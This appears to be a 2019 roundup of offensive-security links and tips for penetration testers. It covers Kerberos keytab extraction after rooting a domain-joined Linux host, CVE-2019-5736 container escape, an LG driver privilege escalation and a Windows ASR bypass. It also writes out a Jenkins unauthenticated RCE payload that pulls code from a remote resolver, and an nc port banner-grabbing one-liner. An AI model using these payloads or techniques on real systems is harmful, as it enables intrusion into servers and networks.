Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
Parses Kerberos Keytab files
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver
http://www.jackson-t.ca/lg-driver-lpe.html
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
Jenkins Unauth RCE
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
Bypass Windows Exploit Guard ASR
https://github.com/sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019
Public documents related to my talk "Bypass Windows Exploit Guard ASR" at Offensive Con 2019.
No nmap? No problem! Grab banners from local IPv4 listening ports.
# Extract only the local port column (avoids picking digits out of IP addresses), then banner-grab each port once
netstat -nlt | grep 'tcp ' | awk '{print $4}' | sed 's/.*://' | sort -un | xargs -I {} sh -c 'echo | nc -v -n -w1 127.0.0.1 {}'
Web Cache Deception Attack leads to user info disclosure
https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29
[Remote Exec | Persistence] - Hunting for remote windows service creation
https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
pastebin_scraper
https://github.com/Critical-Start/pastebin_scraper
Automated tool to monitor pastebin for interesting information